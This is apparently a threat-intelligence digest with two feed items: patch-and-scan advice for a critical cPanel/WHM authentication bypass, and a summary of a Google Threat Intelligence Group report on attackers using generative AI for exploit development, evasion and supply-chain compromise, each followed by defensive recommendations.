Immediately patch cPanel/WHM to the latest version to mitigate CVE-2026-41940, and scan for unauthorized Filemanager files or unusual authentication logs. Restrict network access to management interfaces and enable multi-factor authentication.

Classification

Vulnerability, Critical Severity, Authentication Bypass, Backdoor

Source

Source feed: The Hacker News | Original source

GTIG AI Threat Tracker: Adversaries Leverage AI for Vulnerability Exploitation, Augmented Operations, and Initial Access

Google Threat Intelligence Group — Mon, 11 May 2026 14:00:00 GMT

AI Summary

Google Threat Intelligence Group highlights a paradigm shift in cyber operations, where adversaries increasingly leverage generative AI to automate and scale attack lifecycles. State-sponsored and criminal groups are utilizing AI for advanced vulnerability discovery, zero-day exploit development, and AI-augmented defense evasion through polymorphic code and decoy logic. Notable malware families like PROMPTSPY and SANDCLOCK demonstrate autonomous orchestration and credential theft capabilities. Supply chain compromises targeting AI development ecosystems and open-source dependencies pose significant initial access risks. Defenders must prioritize monitoring for AI-augmented behavioral anomalies, enforce strict supply chain integrity controls, implement AI model abuse detection, and deploy advanced behavioral analytics to counter dynamic command generation and automated reconnaissance. Proactive threat hunting and robust LLM usage policies are critical to mitigating this evolving threat landscape.

Why do I care?

Adversaries are industrializing AI to automate exploit development, evade detection through polymorphic code, and compromise software supply chains, drastically lowering the barrier for sophisticated, high-volume attacks that traditional signatures cannot stop.

What can I do about it?

Enforce strict software supply chain verification, deploy behavioral monitoring for anomalous API usage and dynamic command generation, and implement automated code analysis tools to detect AI-generated obfuscation and malicious dependencies.

Classification

Vulnerability, High Severity, AI-Augmented Malware, Information Operations, Supply Chain Compromise

Source

Source feed: Mandiant Frontline Blog | Original source